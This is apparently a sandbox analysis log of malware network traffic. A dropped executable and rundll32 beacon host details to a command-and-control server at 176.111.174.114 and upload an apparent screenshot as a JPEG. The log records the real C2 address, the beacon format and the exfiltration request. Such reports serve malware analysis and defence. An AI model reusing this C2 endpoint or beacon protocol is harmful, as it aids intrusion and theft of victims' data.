                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          15176.111.174.11480192.168.2.449755C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:11.577802896 CEST4528INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:11 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          150176.111.174.11480192.168.2.449826C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:35.538959980 CEST5061INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:35 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          151176.111.174.11480192.168.2.449824C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:35.655622005 CEST5124INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:35 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 0
                                                                                                                                          Keep-Alive: timeout=5, max=100
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Type: text/html; charset=UTF-8


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          152192.168.2.449827176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:35.749243975 CEST5125OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          153176.111.174.11480192.168.2.449827C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:35.847718000 CEST5125INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:35 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          154192.168.2.449830176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:36.063796997 CEST5133OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          155176.111.174.11480192.168.2.449830C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:36.164963007 CEST5134INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:36 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          156192.168.2.449831176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:36.380536079 CEST5213OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          157176.111.174.11480192.168.2.449831C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:36.479239941 CEST5214INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:36 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          158192.168.2.449833176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:36.694013119 CEST5221OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          159176.111.174.11480192.168.2.449833C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:36.801321983 CEST5229INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:36 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          16192.168.2.449756176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:11.785012007 CEST4529OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          160192.168.2.449835176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:37.022660971 CEST5256OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          161176.111.174.11480192.168.2.449835C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:37.125809908 CEST5258INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:37 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          162192.168.2.449838176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:37.331136942 CEST5268OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          163176.111.174.11480192.168.2.449838C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:37.437372923 CEST5288INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:37 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          164192.168.2.449839176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:37.655920029 CEST5331OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          165176.111.174.11480192.168.2.449839C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:37.772948980 CEST5332INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:37 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          166192.168.2.449841176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:37.989100933 CEST5341OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          167176.111.174.11480192.168.2.449841C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:38.093897104 CEST5343INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:38 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          168192.168.2.449842176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:38.300671101 CEST5421OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          169176.111.174.11480192.168.2.449842C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:38.398679972 CEST5422INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:38 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          17176.111.174.11480192.168.2.449756C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:11.890094995 CEST4529INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:11 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          170192.168.2.449843176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:38.462100029 CEST5436OUTPOST //Hnq8vS/index.php?scr=up HTTP/1.1
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          User-Agent: Uploador
                                                                                                                                          Content-Type: multipart/form-data; boundary=152138533219.jpg
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Length: 227184
                                                                                                                                          Data Raw: 2d 2d 31 35 32 31 33 38 35 33 33 32 31 39 2e 6a 70 67 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 31 35 32 31 33 38 35 33 33 32 31 39 2e 6a 70 67 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 02 01 01 01 01 01 02 01 01 01 02 02 02 02 02 04 03 02 02 02 02 05 04 04 03 04 06 05 06 06 06 05 06 06 06 07 09 08 06 07 09 07 06 06 08 0b 08 09 0a 0a 0a 0a 0a 06 08 0b 0c 0b 0a 0c 09 0a 0a 0a ff db 00 43 01 02 02 02 02 02 02 05 03 03 05 0a 07 06 07 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08 23 42 b1 c1 15 52 d1 f0 24 33 62 72 82 09 0a 16 17 18 19 1a 25 26 27 28 29 2a 34 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e1 e2 e3 e4 e5 e6 e7 e8 e9 ea f1 f2 f3 f4 f5 f6 f7 f8 f9 fa ff c4 00 1f 01 00 03 01 01 01 01 01 01 01 01 01 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 11 00 02 01 02 04 04 03 04 07 05 04 04 00 01 02 77 00 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 fc 50 8a 2f 2e 9f 52 fd 8f 77 5c d2 ec 35 fa 5c 69 9f 07 ce 47 1f 7a 75 7b 17 c1 af d8 53 f6 86 f8 d3 e1 3b 2f 89 1a 56 81 65 a2 f8 4f 50 9e 48 ad 3c 51 e2 2b f5 b7 b5 99 a3 72 92 18 91 43 4f 70 15 c1 56 30 c5 26 d2 08 38 22 bd df e1 ff 00 fc 13 93 e0 87 85 f6 5d 7c 4a f1 de b3 e2 bb c5 5c b5 9e 91 12 e9 b6 28 e0 f4 f3 1c 49 35 c4 67 d9 6d 9f e9 58 d5 c4 e1 e9 68 e5 af 91 ac 28 56 a8 ae 96 87 c5 29 f7 6a c2 7d da fd 19 bd fd 87 ff 00 63 8f 1a 78 7f ec 6f f0 5a 7f 0f c8 cd 95 d4 7c 2f e2 7b e5 b8 07 8c 03 f6 e9 2e a2 2b ea 3c b0 c7 b3 0a f2 1f 88 7f f0 49 df 12 c4 b2 5d fc 0b f8 c9 a4 eb a0 6e 31 e8 fe 27 87 fb 22 f1 cf 50 89 29 79 2d 58 01 c6 f9 26 87 24 7d d1 9e 2a 9e 3f 0f 3d f4 f5 26 b6 0e bc 76 57 f4 3e 45 a4 55 c6 45 76 df 16 7f 67 5f 8e 7f 01 ee a3 8b e2 ef c2 bd 6b 42 8a 79 0a 59 df de 59 37 d8 ef 08 19 fd c5 ca e6 19 c6 3b c6 ec 38 3c f1 5c 5b 6f ef 5d d1 94 65 0b a7 73 85 a9 45 d9 90 c7 1b d0 fd 3f 1a 96 9a f8 ee 29 72 15 cd 76 57 93 b5 44 e3 9f ad 4b 27 6a 6e dd dc 62 b1 94 4d e3 b9 4e 44 3e b5 1d 7e c7 f8 9b fe 0d 34 d5 7c 37 75 f6 7b ff 00 db 9f 74 2e d8 86 e5 3e 18 65 5f ff 00 2a 7c 1f 6f e6 39 aa d6 bf f0 6a 22 dc f5 fd bd f6 ff 00 dd 2d cf fe e5 2b f3 2a de 2b f0 05 29 b8 4f 19 66 bf e9 dd 6f fe 56 7d 64 38 4b 88 a5 1e 65 43 4f f1 43 ff 00 92 3f 1e a3 eb f8 54 be 53 fa 57 ec 8d b7 fc 1a 4e 2e 17 1f f0 f0 1d bc ff 00 d1 29 cf fe e5 6b f2 8b f6 87 f8 44 df b3 ff 00 ed 09 e3 df 80 8f af 8d 58 f8 27 c6 5a a6 80 75 51 6b e4 0b c3 67 77 2d bf 9d e5 ee 6f 2f 7f 97 bb 6e e6 db 9c 64 e3 35 ef 70 ff 00 19 70 df 13 d5 9d 3c b2 bf b4 94 12 6f dd 9c 6c 9e 9f 6a 31 fc 0f 3b 31 c9 73 3c ae 2a 58 aa 7c a9 e8 b5 8b fc 9b 38 a7 39 38 a1 36 7f 1d 39 d1 b3 9a 65 7d 49 e5 0e 65 fe e5 21 56 5e a2 92 9d bc d0 1b 11 f9 7e f4 2a f7 34 f7 eb 5f af bf f0 6e 6f fc 12 17 f6 1d ff 00 82 90 7e cd
